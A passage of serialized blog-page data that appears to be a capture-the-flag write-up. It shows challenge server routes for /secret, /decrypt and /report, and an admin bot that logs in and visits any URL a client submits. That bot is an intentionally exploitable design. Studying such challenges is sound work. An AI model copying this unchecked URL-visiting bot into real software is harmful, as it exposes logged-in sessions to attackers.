66},{"style":312},[46467],{"type":38,"value":215},{"type":33,"tag":128,"props":46469,"children":46470},{"style":306},[46471],{"type":38,"value":6557},{"type":33,"tag":128,"props":46473,"children":46474},{"style":312},[46475],{"type":38,"value":215},{"type":33,"tag":128,"props":46477,"children":46478},{"style":306},[46479],{"type":38,"value":6566},{"type":33,"tag":128,"props":46481,"children":46482},{"style":312},[46483],{"type":38,"value":2427},{"type":33,"tag":128,"props":46485,"children":46486},{"class":130,"line":403},[46487,46491,46495,46499,46503,46508,46512,46517,46521,46525,46529,46533,46537,46541],{"type":33,"tag":128,"props":46488,"children":46489},{"style":300},[46490],{"type":38,"value":5696},{"type":33,"tag":128,"props":46492,"children":46493},{"style":306},[46494],{"type":38,"value":35848},{"type":33,"tag":1
28,"props":46496,"children":46497},{"style":312},[46498],{"type":38,"value":5657},{"type":33,"tag":128,"props":46500,"children":46501},{"style":1576},[46502],{"type":38,"value":5796},{"type":33,"tag":128,"props":46504,"children":46505},{"style":306},[46506],{"type":38,"value":46507}," db",{"type":33,"tag":128,"props":46509,"children":46510},{"style":312},[46511],{"type":38,"value":215},{"type":33,"tag":128,"props":46513,"children":46514},{"style":135},[46515],{"type":38,"value":46516},"getSecret",{"type":33,"tag":128,"props":46518,"children":46519},{"style":312},[46520],{"type":38,"value":5566},{"type":33,"tag":128,"props":46522,"children":46523},{"style":306},[46524],{"type":38,"value":5607},{"type":33,"tag":128,"props":46526,"children":46527},{"style":312},[46528],{"type":38,"value":215},{"type":33,"tag":128,"props":46530,"children":46531},{"style":306},[46532],{"type":38,"value":6557},{"type":33,"tag":128,"props":46534,"children":46535},{"style":312},[46536],{"type":38,"value":215},{"type":33,"tag":128,"props":46538,"children":46539},{"style":306},[46540],{"type":38,"value":6566},{"type":33,"tag":128,"props":46542,"children":46543},{"style":312},[46544],{"type":38,"value":5815},{"type":33,"tag":128,"props":46546,"children":46547},{"class":130,"line":739},[46548,46552,46556,46560,46564],{"type":33,"tag":128,"props":46549,"children":46550},{"style":1576},[46551],{"type":38,"value":6625},{"type":33,"tag":128,"props":46553,"children":46554},{"style":312},[46555],{"type":38,"value":2852},{"type":33,"tag":128,"props":46557,"children":46558},{"style":306},[46559],{"type":38,"value":35934},{"type":33,"tag":128,"props":46561,"children":46562},{"style":312},[46563],{"type":38,"value":2966},{"type":33,"tag":128,"props":46565,"children":46566},{"style":312},[46567],{"type":38,"value":762},{"type":33,"tag":128,"props":46569,"children":46570},{"class":130,"line":765},[46571,46575,46579,46583,46587,46591,46596,46600,46604,46608,46612,46616,46620],{"type":33,"tag":128,"props":46
572,"children":46573},{"style":1576},[46574],{"type":38,"value":13615},{"type":33,"tag":128,"props":46576,"children":46577},{"style":306},[46578],{"type":38,"value":5616},{"type":33,"tag":128,"props":46580,"children":46581},{"style":312},[46582],{"type":38,"value":215},{"type":33,"tag":128,"props":46584,"children":46585},{"style":135},[46586],{"type":38,"value":6686},{"type":33,"tag":128,"props":46588,"children":46589},{"style":312},[46590],{"type":38,"value":5566},{"type":33,"tag":128,"props":46592,"children":46593},{"style":523},[46594],{"type":38,"value":46595},"200",{"type":33,"tag":128,"props":46597,"children":46598},{"style":312},[46599],{"type":38,"value":6700},{"type":33,"tag":128,"props":46601,"children":46602},{"style":135},[46603],{"type":38,"value":633},{"type":33,"tag":128,"props":46605,"children":46606},{"style":312},[46607],{"type":38,"value":5836},{"type":33,"tag":128,"props":46609,"children":46610},{"style":437},[46611],{"type":38,"value":5066},{"type":33,"tag":128,"props":46613,"children":46614},{"style":312},[46615],{"type":38,"value":284},{"type":33,"tag":128,"props":46617,"children":46618},{"style":306},[46619],{"type":38,"value":35848},{"type":33,"tag":128,"props":46621,"children":46622},{"style":312},[46623],{"type":38,"value":5863},{"type":33,"tag":128,"props":46625,"children":46626},{"class":130,"line":804},[46627],{"type":33,"tag":128,"props":46628,"children":46629},{"style":312},[46630],{"type":38,"value":6760},{"type":33,"tag":128,"props":46632,"children":46633},{"class":130,"line":839},[46634,46638,46642,46646,46650,46654,46658,46662,46666,46670,46674,46678,46682,46687,46691],{"type":33,"tag":128,"props":46635,"children":46636},{"style":1576},[46637],{"type":38,"value":6810},{"type":33,"tag":128,"props":46639,"children":46640},{"style":306},[46641],{"type":38,"value":5616},{"type":33,"tag":128,"props":46643,"children":46644},{"style":312},[46645],{"type":38,"value":215},{"type":33,"tag":128,"props":46647,"children":46648},{"style":135},[
46649],{"type":38,"value":6686},{"type":33,"tag":128,"props":46651,"children":46652},{"style":312},[46653],{"type":38,"value":5566},{"type":33,"tag":128,"props":46655,"children":46656},{"style":523},[46657],{"type":38,"value":6695},{"type":33,"tag":128,"props":46659,"children":46660},{"style":312},[46661],{"type":38,"value":6700},{"type":33,"tag":128,"props":46663,"children":46664},{"style":135},[46665],{"type":38,"value":633},{"type":33,"tag":128,"props":46667,"children":46668},{"style":312},[46669],{"type":38,"value":5836},{"type":33,"tag":128,"props":46671,"children":46672},{"style":437},[46673],{"type":38,"value":14251},{"type":33,"tag":128,"props":46675,"children":46676},{"style":312},[46677],{"type":38,"value":284},{"type":33,"tag":128,"props":46679,"children":46680},{"style":676},[46681],{"type":38,"value":6739},{"type":33,"tag":128,"props":46683,"children":46684},{"style":140},[46685],{"type":38,"value":46686},"No secret found",{"type":33,"tag":128,"props":46688,"children":46689},{"style":676},[46690],{"type":38,"value":6040},{"type":33,"tag":128,"props":46692,"children":46693},{"style":312},[46694],{"type":38,"value":5863},{"type":33,"tag":128,"props":46696,"children":46697},{"class":130,"line":848},[46698],{"type":33,"tag":128,"props":46699,"children":46700},{"style":312},[46701],{"type":38,"value":5902},{"type":33,"tag":128,"props":46703,"children":46704},{"class":130,"line":976},[46705],{"type":33,"tag":128,"props":46706,"children":46707},{"emptyLinePlaceholder":896},[46708],{"type":38,"value":899},{"type":33,"tag":128,"props":46710,"children":46711},{"class":130,"line":988},[46712,46716,46720,46724,46728,46732,46737,46741,46745,46749,46753,46757,46761,46765,46769,46773],{"type":33,"tag":128,"props":46713,"children":46714},{"style":306},[46715],{"type":38,"value":5552},{"type":33,"tag":128,"props":46717,"children":46718},{"style":312},[46719],{"type":38,"value":215},{"type":33,"tag":128,"props":46721,"children":46722},{"style":135},[46723],{"type":38,"va
lue":5561},{"type":33,"tag":128,"props":46725,"children":46726},{"style":312},[46727],{"type":38,"value":5566},{"type":33,"tag":128,"props":46729,"children":46730},{"style":676},[46731],{"type":38,"value":6040},{"type":33,"tag":128,"props":46733,"children":46734},{"style":140},[46735],{"type":38,"value":46736},"/decrypt",{"type":33,"tag":128,"props":46738,"children":46739},{"style":676},[46740],{"type":38,"value":6040},{"type":33,"tag":128,"props":46742,"children":46743},{"style":312},[46744],{"type":38,"value":5584},{"type":33,"tag":128,"props":46746,"children":46747},{"style":300},[46748],{"type":38,"value":5598},{"type":33,"tag":128,"props":46750,"children":46751},{"style":312},[46752],{"type":38,"value":2852},{"type":33,"tag":128,"props":46754,"children":46755},{"style":306},[46756],{"type":38,"value":5607},{"type":33,"tag":128,"props":46758,"children":46759},{"style":312},[46760],{"type":38,"value":5584},{"type":33,"tag":128,"props":46762,"children":46763},{"style":306},[46764],{"type":38,"value":5616},{"type":33,"tag":128,"props":46766,"children":46767},{"style":312},[46768],{"type":38,"value":2966},{"type":33,"tag":128,"props":46770,"children":46771},{"style":312},[46772],{"type":38,"value":5625},{"type":33,"tag":128,"props":46774,"children":46775},{"style":312},[46776],{"type":38,"value":762},{"type":33,"tag":128,"props":46778,"children":46779},{"class":130,"line":1001},[46780,46784,46788,46792,46796,46800,46804,46808,46813,46817],{"type":33,"tag":128,"props":46781,"children":46782},{"style":1576},[46783],{"type":38,"value":6625},{"type":33,"tag":128,"props":46785,"children":46786},{"style":312},[46787],{"type":38,"value":2852},{"type":33,"tag":128,"props":46789,"children":46790},{"style":300},[46791],{"type":38,"value":16424},{"type":33,"tag":128,"props":46793,"children":46794},{"style":306},[46795],{"type":38,"value":5607},{"type":33,"tag":128,"props":46797,"children":46798},{"style":312},[46799],{"type":38,"value":215},{"type":33,"tag":128,"props":46801,"
children":46802},{"style":306},[46803],{"type":38,"value":5671},{"type":33,"tag":128,"props":46805,"children":46806},{"style":312},[46807],{"type":38,"value":215},{"type":33,"tag":128,"props":46809,"children":46810},{"style":306},[46811],{"type":38,"value":46812},"secret",{"type":33,"tag":128,"props":46814,"children":46815},{"style":312},[46816],{"type":38,"value":2966},{"type":33,"tag":128,"props":46818,"children":46819},{"style":312},[46820],{"type":38,"value":762},{"type":33,"tag":128,"props":46822,"children":46823},{"class":130,"line":1014},[46824,46828,46832,46836,46840,46844,46848,46852,46856,46860,46864,46868,46872,46877,46881],{"type":33,"tag":128,"props":46825,"children":46826},{"style":1576},[46827],{"type":38,"value":13615},{"type":33,"tag":128,"props":46829,"children":46830},{"style":306},[46831],{"type":38,"value":5616},{"type":33,"tag":128,"props":46833,"children":46834},{"style":312},[46835],{"type":38,"value":215},{"type":33,"tag":128,"props":46837,"children":46838},{"style":135},[46839],{"type":38,"value":6686},{"type":33,"tag":128,"props":46841,"children":46842},{"style":312},[46843],{"type":38,"value":5566},{"type":33,"tag":128,"props":46845,"children":46846},{"style":523},[46847],{"type":38,"value":6695},{"type":33,"tag":128,"props":46849,"children":46850},{"style":312},[46851],{"type":38,"value":6700},{"type":33,"tag":128,"props":46853,"children":46854},{"style":135},[46855],{"type":38,"value":633},{"type":33,"tag":128,"props":46857,"children":46858},{"style":312},[46859],{"type":38,"value":5836},{"type":33,"tag":128,"props":46861,"children":46862},{"style":437},[46863],{"type":38,"value":14251},{"type":33,"tag":128,"props":46865,"children":46866},{"style":312},[46867],{"type":38,"value":284},{"type":33,"tag":128,"props":46869,"children":46870},{"style":676},[46871],{"type":38,"value":6739},{"type":33,"tag":128,"props":46873,"children":46874},{"style":140},[46875],{"type":38,"value":46876},"Missing 
secret",{"type":33,"tag":128,"props":46878,"children":46879},{"style":676},[46880],{"type":38,"value":6040},{"type":33,"tag":128,"props":46882,"children":46883},{"style":312},[46884],{"type":38,"value":5863},{"type":33,"tag":128,"props":46886,"children":46887},{"class":130,"line":1026},[46888],{"type":33,"tag":128,"props":46889,"children":46890},{"style":312},[46891],{"type":38,"value":6760},{"type":33,"tag":128,"props":46893,"children":46894},{"class":130,"line":1038},[46895],{"type":33,"tag":128,"props":46896,"children":46897},{"emptyLinePlaceholder":896},[46898],{"type":38,"value":899},{"type":33,"tag":128,"props":46900,"children":46901},{"class":130,"line":1051},[46902,46906,46910,46914,46918,46922,46926,46930,46935,46939],{"type":33,"tag":128,"props":46903,"children":46904},{"style":1576},[46905],{"type":38,"value":6625},{"type":33,"tag":128,"props":46907,"children":46908},{"style":312},[46909],{"type":38,"value":2852},{"type":33,"tag":128,"props":46911,"children":46912},{"style":300},[46913],{"type":38,"value":16424},{"type":33,"tag":128,"props":46915,"children":46916},{"style":306},[46917],{"type":38,"value":5607},{"type":33,"tag":128,"props":46919,"children":46920},{"style":312},[46921],{"type":38,"value":215},{"type":33,"tag":128,"props":46923,"children":46924},{"style":306},[46925],{"type":38,"value":5671},{"type":33,"tag":128,"props":46927,"children":46928},{"style":312},[46929],{"type":38,"value":215},{"type":33,"tag":128,"props":46931,"children":46932},{"style":306},[46933],{"type":38,"value":46934},"cipher",{"type":33,"tag":128,"props":46936,"children":46937},{"style":312},[46938],{"type":38,"value":2966},{"type":33,"tag":128,"props":46940,"children":46941},{"style":312},[46942],{"type":38,"value":762},{"type":33,"tag":128,"props":46944,"children":46945},{"class":130,"line":1063},[46946,46950,46954,46958,46962,46966,46970,46974,46978,46982,46986,46990,46994,46999,47003],{"type":33,"tag":128,"props":46947,"children":46948},{"style":1576},[46949],{"type"
:38,"value":13615},{"type":33,"tag":128,"props":46951,"children":46952},{"style":306},[46953],{"type":38,"value":5616},{"type":33,"tag":128,"props":46955,"children":46956},{"style":312},[46957],{"type":38,"value":215},{"type":33,"tag":128,"props":46959,"children":46960},{"style":135},[46961],{"type":38,"value":6686},{"type":33,"tag":128,"props":46963,"children":46964},{"style":312},[46965],{"type":38,"value":5566},{"type":33,"tag":128,"props":46967,"children":46968},{"style":523},[46969],{"type":38,"value":6695},{"type":33,"tag":128,"props":46971,"children":46972},{"style":312},[46973],{"type":38,"value":6700},{"type":33,"tag":128,"props":46975,"children":46976},{"style":135},[46977],{"type":38,"value":633},{"type":33,"tag":128,"props":46979,"children":46980},{"style":312},[46981],{"type":38,"value":5836},{"type":33,"tag":128,"props":46983,"children":46984},{"style":437},[46985],{"type":38,"value":14251},{"type":33,"tag":128,"props":46987,"children":46988},{"style":312},[46989],{"type":38,"value":284},{"type":33,"tag":128,"props":46991,"children":46992},{"style":676},[46993],{"type":38,"value":6739},{"type":33,"tag":128,"props":46995,"children":46996},{"style":140},[46997],{"type":38,"value":46998},"Missing 
cipher",{"type":33,"tag":128,"props":47000,"children":47001},{"style":676},[47002],{"type":38,"value":6040},{"type":33,"tag":128,"props":47004,"children":47005},{"style":312},[47006],{"type":38,"value":5863},{"type":33,"tag":128,"props":47008,"children":47009},{"class":130,"line":1076},[47010],{"type":33,"tag":128,"props":47011,"children":47012},{"style":312},[47013],{"type":38,"value":6760},{"type":33,"tag":128,"props":47015,"children":47016},{"class":130,"line":1089},[47017],{"type":33,"tag":128,"props":47018,"children":47019},{"emptyLinePlaceholder":896},[47020],{"type":38,"value":899},{"type":33,"tag":128,"props":47022,"children":47023},{"class":130,"line":1101},[47024,47028],{"type":33,"tag":128,"props":47025,"children":47026},{"style":1576},[47027],{"type":38,"value":16034},{"type":33,"tag":128,"props":47029,"children":47030},{"style":312},[47031],{"type":38,"value":762},{"type":33,"tag":128,"props":47033,"children":47034},{"class":130,"line":1114},[47035,47039,47043,47047,47052,47056,47060,47064,47068,47072,47076,47080,47084,47088,47092,47096,47100],{"type":33,"tag":128,"props":47036,"children":47037},{"style":300},[47038],{"type":38,"value":15121},{"type":33,"tag":128,"props":47040,"children":47041},{"style":306},[47042],{"type":38,"value":35848},{"type":33,"tag":128,"props":47044,"children":47045},{"style":312},[47046],{"type":38,"value":5657},{"type":33,"tag":128,"props":47048,"children":47049},{"style":135},[47050],{"type":38,"value":47051}," 
decrypt",{"type":33,"tag":128,"props":47053,"children":47054},{"style":312},[47055],{"type":38,"value":5566},{"type":33,"tag":128,"props":47057,"children":47058},{"style":306},[47059],{"type":38,"value":5607},{"type":33,"tag":128,"props":47061,"children":47062},{"style":312},[47063],{"type":38,"value":215},{"type":33,"tag":128,"props":47065,"children":47066},{"style":306},[47067],{"type":38,"value":5671},{"type":33,"tag":128,"props":47069,"children":47070},{"style":312},[47071],{"type":38,"value":215},{"type":33,"tag":128,"props":47073,"children":47074},{"style":306},[47075],{"type":38,"value":46934},{"type":33,"tag":128,"props":47077,"children":47078},{"style":312},[47079],{"type":38,"value":5584},{"type":33,"tag":128,"props":47081,"children":47082},{"style":306},[47083],{"type":38,"value":5662},{"type":33,"tag":128,"props":47085,"children":47086},{"style":312},[47087],{"type":38,"value":215},{"type":33,"tag":128,"props":47089,"children":47090},{"style":306},[47091],{"type":38,"value":5671},{"type":33,"tag":128,"props":47093,"children":47094},{"style":312},[47095],{"type":38,"value":215},{"type":33,"tag":128,"props":47097,"children":47098},{"style":306},[47099],{"type":38,"value":46812},{"type":33,"tag":128,"props":47101,"children":47102},{"style":312},[47103],{"type":38,"value":5815},{"type":33,"tag":128,"props":47105,"children":47106},{"class":130,"line":1127},[47107,47111,47115,47119,47123,47127,47131,47135,47139,47143,47148,47152,47156],{"type":33,"tag":128,"props":47108,"children":47109},{"style":1576},[47110],{"type":38,"value":13615},{"type":33,"tag":128,"props":47112,"children":47113},{"style":306},[47114],{"type":38,"value":5616},{"type":33,"tag":128,"props":47116,"children":47117},{"style":312},[47118],{"type":38,"value":215},{"type":33,"tag":128,"props":47120,"children":47121},{"style":135},[47122],{"type":38,"value":6686},{"type":33,"tag":128,"props":47124,"children":47125},{"style":312},[47126],{"type":38,"value":5566},{"type":33,"tag":128,"props":4712
8,"children":47129},{"style":523},[47130],{"type":38,"value":46595},{"type":33,"tag":128,"props":47132,"children":47133},{"style":312},[47134],{"type":38,"value":6700},{"type":33,"tag":128,"props":47136,"children":47137},{"style":135},[47138],{"type":38,"value":633},{"type":33,"tag":128,"props":47140,"children":47141},{"style":312},[47142],{"type":38,"value":5836},{"type":33,"tag":128,"props":47144,"children":47145},{"style":437},[47146],{"type":38,"value":47147}," decrypted",{"type":33,"tag":128,"props":47149,"children":47150},{"style":312},[47151],{"type":38,"value":284},{"type":33,"tag":128,"props":47153,"children":47154},{"style":306},[47155],{"type":38,"value":35848},{"type":33,"tag":128,"props":47157,"children":47158},{"style":312},[47159],{"type":38,"value":5863},{"type":33,"tag":128,"props":47161,"children":47162},{"class":130,"line":1139},[47163,47167,47171,47175,47179,47183],{"type":33,"tag":128,"props":47164,"children":47165},{"style":312},[47166],{"type":38,"value":14264},{"type":33,"tag":128,"props":47168,"children":47169},{"style":1576},[47170],{"type":38,"value":6855},{"type":33,"tag":128,"props":47172,"children":47173},{"style":312},[47174],{"type":38,"value":2852},{"type":33,"tag":128,"props":47176,"children":47177},{"style":306},[47178],{"type":38,"value":23474},{"type":33,"tag":128,"props":47180,"children":47181},{"style":312},[47182],{"type":38,"value":2966},{"type":33,"tag":128,"props":47184,"children":47185},{"style":312},[47186],{"type":38,"value":762},{"type":33,"tag":128,"props":47188,"children":47189},{"class":130,"line":1152},[47190,47194,47198,47202,47206,47210,47214,47218,47222,47226,47230,47234,47238,47243,47247],{"type":33,"tag":128,"props":47191,"children":47192},{"style":1576},[47193],{"type":38,"value":13615},{"type":33,"tag":128,"props":47195,"children":47196},{"style":306},[47197],{"type":38,"value":5616},{"type":33,"tag":128,"props":47199,"children":47200},{"style":312},[47201],{"type":38,"value":215},{"type":33,"tag":128,"props"
:47203,"children":47204},{"style":135},[47205],{"type":38,"value":6686},{"type":33,"tag":128,"props":47207,"children":47208},{"style":312},[47209],{"type":38,"value":5566},{"type":33,"tag":128,"props":47211,"children":47212},{"style":523},[47213],{"type":38,"value":6695},{"type":33,"tag":128,"props":47215,"children":47216},{"style":312},[47217],{"type":38,"value":6700},{"type":33,"tag":128,"props":47219,"children":47220},{"style":135},[47221],{"type":38,"value":633},{"type":33,"tag":128,"props":47223,"children":47224},{"style":312},[47225],{"type":38,"value":5836},{"type":33,"tag":128,"props":47227,"children":47228},{"style":437},[47229],{"type":38,"value":14251},{"type":33,"tag":128,"props":47231,"children":47232},{"style":312},[47233],{"type":38,"value":284},{"type":33,"tag":128,"props":47235,"children":47236},{"style":676},[47237],{"type":38,"value":6739},{"type":33,"tag":128,"props":47239,"children":47240},{"style":140},[47241],{"type":38,"value":47242},"Invalid key or cipher",{"type":33,"tag":128,"props":47244,"children":47245},{"style":676},[47246],{"type":38,"value":6040},{"type":33,"tag":128,"props":47248,"children":47249},{"style":312},[47250],{"type":38,"value":5863},{"type":33,"tag":128,"props":47252,"children":47253},{"class":130,"line":1165},[47254],{"type":33,"tag":128,"props":47255,"children":47256},{"style":312},[47257],{"type":38,"value":6760},{"type":33,"tag":128,"props":47259,"children":47260},{"class":130,"line":1177},[47261],{"type":33,"tag":128,"props":47262,"children":47263},{"style":312},[47264],{"type":38,"value":5902},{"type":33,"tag":128,"props":47266,"children":47267},{"class":130,"line":1189},[47268],{"type":33,"tag":128,"props":47269,"children":47270},{"emptyLinePlaceholder":896},[47271],{"type":38,"value":899},{"type":33,"tag":128,"props":47273,"children":47274},{"class":130,"line":1202},[47275],{"type":33,"tag":128,"props":47276,"children":47277},{"style":5541},[47278],{"type":38,"value":47279},"// Report any suspicious activity to 
the admin!\n",{"type":33,"tag":128,"props":47281,"children":47282},{"class":130,"line":1214},[47283,47287,47291,47295,47299,47303,47308,47312,47316,47321],{"type":33,"tag":128,"props":47284,"children":47285},{"style":306},[47286],{"type":38,"value":5552},{"type":33,"tag":128,"props":47288,"children":47289},{"style":312},[47290],{"type":38,"value":215},{"type":33,"tag":128,"props":47292,"children":47293},{"style":135},[47294],{"type":38,"value":5561},{"type":33,"tag":128,"props":47296,"children":47297},{"style":312},[47298],{"type":38,"value":5566},{"type":33,"tag":128,"props":47300,"children":47301},{"style":676},[47302],{"type":38,"value":6040},{"type":33,"tag":128,"props":47304,"children":47305},{"style":140},[47306],{"type":38,"value":47307},"/report",{"type":33,"tag":128,"props":47309,"children":47310},{"style":676},[47311],{"type":38,"value":6040},{"type":33,"tag":128,"props":47313,"children":47314},{"style":312},[47315],{"type":38,"value":5584},{"type":33,"tag":128,"props":47317,"children":47318},{"style":306},[47319],{"type":38,"value":47320}," doReportHandler",{"type":33,"tag":128,"props":47322,"children":47323},{"style":312},[47324],{"type":38,"value":5815},{"type":33,"tag":239,"props":47326,"children":47327},{},[47328,47333,47338],{"type":33,"tag":243,"props":47329,"children":47330},{},[47331],{"type":38,"value":47332},"GET /secret - When a client sends a GET request to the /secret endpoint, the server will retrieve the secret associated with the user's session using the userId stored in the session. If the secret is found, the server will return a 200 OK response with a secret field in the JSON response body. 
If the secret is not found, the server will return a 400 Bad Request response with an error field indicating that no secret was found.",{"type":33,"tag":243,"props":47334,"children":47335},{},[47336],{"type":38,"value":47337},"POST /decrypt - When a client sends a POST request to the /decrypt endpoint with a cipher and secret in the request body, the server will attempt to decrypt the cipher using the secret. If either the secret or cipher is missing, the server will return a 400 Bad Request response with an error field indicating that one of the required fields is missing. If the decryption fails, the server will return a 400 Bad Request response with an error field indicating that the key or cipher is invalid. If the decryption is successful, the server will return a 200 OK response with a decrypted field in the JSON response body.",{"type":33,"tag":243,"props":47339,"children":47340},{},[47341],{"type":38,"value":47342},"POST /report - When a client sends a POST request to the /report endpoint, the server will handle the request using the doReportHandler function, which appears to be responsible for reporting suspicious activity to the admin.",{"type":33,"tag":47,"props":47344,"children":47345},{},[47346,47348,47354],{"type":38,"value":47347},"The function ",{"type":33,"tag":105,"props":47349,"children":47351},{"className":47350},[],[47352],{"type":38,"value":47353},"doReportHandler",{"type":38,"value":47355}," will trigger a puppeteer script:",{"type":33,"tag":114,"props":47357,"children":47358},{"lang":5526},[47359],{"type":33,"tag":119,"props":47360,"children":47362},{"code":47361,"language":5526,"meta":8,"className":5530,"style":8},"const puppeteer = require('puppeteer')\n\n// please note that 127.0.0.1 and localhost are considered different hosts\n// due to ingress networking rules a container can't reach itself through the it's external IP, so you'd have to use the internal ports (80, 8080) and 127.0.0.1\n\nconst LOGIN_URL = \"http://127.0.0.1/login\";\n\nlet 
browser = null\n\nconst visit = async (url) => {\n    const ctx = await browser.createIncognitoBrowserContext()\n    const page = await ctx.newPage()\n\n    await page.goto(LOGIN_URL, { waitUntil: 'networkidle2' })\n    await page.waitForSelector('form')\n    await page.type('wired-input[name=username]', process.env.USERNAME)\n    await page.type('wired-input[name=password]', process.env.PASSWORD)\n    await page.click('wired-button')\n\n    try {\n        await page.goto(url, { waitUntil: 'networkidle2' })\n    } finally {\n        await page.close()\n        await ctx.close()\n    }\n}\n\nconst doReportHandler = async (req, res) => {\n\n    if (!browser) {\n        console.log('[INFO] Starting browser')\n        browser = await puppeteer.launch({\n            args: [\n                ...\n            ]\n        })\n    }\n\n    const url = req.body.url\n    if (\n        url === undefined ||\n        (!url.startsWith('http://') && !url.startsWith('https://'))\n    ) {\n        return res.status(400).send({ error: 'Invalid URL' })\n    }\n\n    try {\n        await visit(url)\n        return res.sendStatus(200)\n    } catch (e) {\n        return res.status(400).send({ error: e.message })\n    }\n}\n\nmodule.exports = { doReportHandler 
}\n",[47363],{"type":33,"tag":105,"props":47364,"children":47365},{"__ignoreMap":8},[47366,47408,47415,47423,47431,47438,47471,47478,47497,47504,47543,47580,47616,47623,47684,47724,47790,47855,47895,47902,47913,47972,47988,48011,48034,48041,48048,48055,48102,48109,48137,48173,48207,48223,48231,48239,48247,48254,48261,48297,48308,48330,48416,48428,48492,48499,48506,48517,48540,48572,48600,48665,48673,48681,48689],{"type":33,"tag":128,"props":47367,"children":47368},{"class":130,"line":131},[47369,47373,47378,47382,47387,47391,47395,47400,47404],{"type":33,"tag":128,"props":47370,"children":47371},{"style":300},[47372],{"type":38,"value":15973},{"type":33,"tag":128,"props":47374,"children":47375},{"style":306},[47376],{"type":38,"value":47377}," puppeteer",{"type":33,"tag":128,"props":47379,"children":47380},{"style":312},[47381],{"type":38,"value":5657},{"type":33,"tag":128,"props":47383,"children":47384},{"style":135},[47385],{"type":38,"value":47386}," require",{"type":33,"tag":128,"props":47388,"children":47389},{"style":312},[47390],{"type":38,"value":5566},{"type":33,"tag":128,"props":47392,"children":47393},{"style":676},[47394],{"type":38,"value":6040},{"type":33,"tag":128,"props":47396,"children":47397},{"style":140},[47398],{"type":38,"value":47399},"puppeteer",{"type":33,"tag":128,"props":47401,"children":47402},{"style":676},[47403],{"type":38,"value":6040},{"type":33,"tag":128,"props":47405,"children":47406},{"style":312},[47407],{"type":38,"value":2427},{"type":33,"tag":128,"props":47409,"children":47410},{"class":130,"line":362},[47411],{"type":33,"tag":128,"props":47412,"children":47413},{"emptyLinePlaceholder":896},[47414],{"type":38,"value":899},{"type":33,"tag":128,"props":47416,"children":47417},{"class":130,"line":403},[47418],{"type":33,"tag":128,"props":47419,"children":47420},{"style":5541},[47421],{"type":38,"value":47422},"// please note that 127.0.0.1 and localhost are considered different 
hosts\n",{"type":33,"tag":128,"props":47424,"children":47425},{"class":130,"line":739},[47426],{"type":33,"tag":128,"props":47427,"children":47428},{"style":5541},[47429],{"type":38,"value":47430},"// due to ingress networking rules a container can't reach itself through the it's external IP, so you'd have to use the internal ports (80, 8080) and 127.0.0.1\n",{"type":33,"tag":128,"props":47432,"children":47433},{"class":130,"line":765},[47434],{"type":33,"tag":128,"props":47435,"children":47436},{"emptyLinePlaceholder":896},[47437],{"type":38,"value":899},{"type":33,"tag":128,"props":47439,"children":47440},{"class":130,"line":804},[47441,47445,47450,47454,47458,47463,47467],{"type":33,"tag":128,"props":47442,"children":47443},{"style":300},[47444],{"type":38,"value":15973},{"type":33,"tag":128,"props":47446,"children":47447},{"style":306},[47448],{"type":38,"value":47449}," LOGIN_URL",{"type":33,"tag":128,"props":47451,"children":47452},{"style":312},[47453],{"type":38,"value":5657},{"type":33,"tag":128,"props":47455,"children":47456},{"style":676},[47457],{"type":38,"value":679},{"type":33,"tag":128,"props":47459,"children":47460},{"style":140},[47461],{"type":38,"value":47462},"http://127.0.0.1/login",{"type":33,"tag":128,"props":47464,"children":47465},{"style":676},[47466],{"type":38,"value":669},{"type":33,"tag":128,"props":47468,"children":47469},{"style":312},[47470],{"type":38,"value":5676},{"type":33,"tag":128,"props":47472,"children":47473},{"class":130,"line":839},[47474],{"type":33,"tag":128,"props":47475,"children":47476},{"emptyLinePlaceholder":896},[47477],{"type":38,"value":899},{"type":33,"tag":128,"props":47479,"children":47480},{"class":130,"line":848},[47481,47485,47489,47493],{"type":33,"tag":128,"props":47482,"children":47483},{"style":300},[47484],{"type":38,"value":7548},{"type":33,"tag":128,"props":47486,"children":47487},{"style":306},[47488],{"type":38,"value":23581},{"type":33,"tag":128,"props":47490,"children":47491},{"style":312},[4749
2],{"type":38,"value":5657},{"type":33,"tag":128,"props":47494,"children":47495},{"style":300},[47496],{"type":38,"value":41308},{"type":33,"tag":128,"props":47498,"children":47499},{"class":130,"line":976},[47500],{"type":33,"tag":128,"props":47501,"children":47502},{"emptyLinePlaceholder":896},[47503],{"type":38,"value":899},{"type":33,"tag":128,"props":47505,"children":47506},{"class":130,"line":988},[47507,47511,47515,47519,47523,47527,47531,47535,47539],{"type":33,"tag":128,"props":47508,"children":47509},{"style":300},[47510],{"type":38,"value":15973},{"type":33,"tag":128,"props":47512,"children":47513},{"style":135},[47514],{"type":38,"value":23404},{"type":33,"tag":128,"props":47516,"children":47517},{"style":312},[47518],{"type":38,"value":5657},{"type":33,"tag":128,"props":47520,"children":47521},{"style":300},[47522],{"type":38,"value":5598},{"type":33,"tag":128,"props":47524,"children":47525},{"style":312},[47526],{"type":38,"value":2852},{"type":33,"tag":128,"props":47528,"children":47529},{"style":306},[47530],{"type":38,"value":13952},{"type":33,"tag":128,"props":47532,"children":47533},{"style":312},[47534],{"type":38,"value":2966},{"type":33,"tag":128,"props":47536,"children":47537},{"style":312},[47538],{"type":38,"value":5625},{"type":33,"tag":128,"props":47540,"children":47541},{"style":312},[47542],{"type":38,"value":762},{"type":33,"tag":128,"props":47544,"children":47545},{"class":130,"line":1001},[47546,47550,47555,47559,47563,47567,47571,47576],{"type":33,"tag":128,"props":47547,"children":47548},{"style":300},[47549],{"type":38,"value":5696},{"type":33,"tag":128,"props":47551,"children":47552},{"style":306},[47553],{"type":38,"value":47554}," 
ctx",{"type":33,"tag":128,"props":47556,"children":47557},{"style":312},[47558],{"type":38,"value":5657},{"type":33,"tag":128,"props":47560,"children":47561},{"style":1576},[47562],{"type":38,"value":5796},{"type":33,"tag":128,"props":47564,"children":47565},{"style":306},[47566],{"type":38,"value":23581},{"type":33,"tag":128,"props":47568,"children":47569},{"style":312},[47570],{"type":38,"value":215},{"type":33,"tag":128,"props":47572,"children":47573},{"style":135},[47574],{"type":38,"value":47575},"createIncognitoBrowserContext",{"type":33,"tag":128,"props":47577,"children":47578},{"style":312},[47579],{"type":38,"value":7857},{"type":33,"tag":128,"props":47581,"children":47582},{"class":130,"line":1014},[47583,47587,47592,47596,47600,47604,47608,47612],{"type":33,"tag":128,"props":47584,"children":47585},{"style":300},[47586],{"type":38,"value":5696},{"type":33,"tag":128,"props":47588,"children":47589},{"style":306},[47590],{"type":38,"value":47591}," 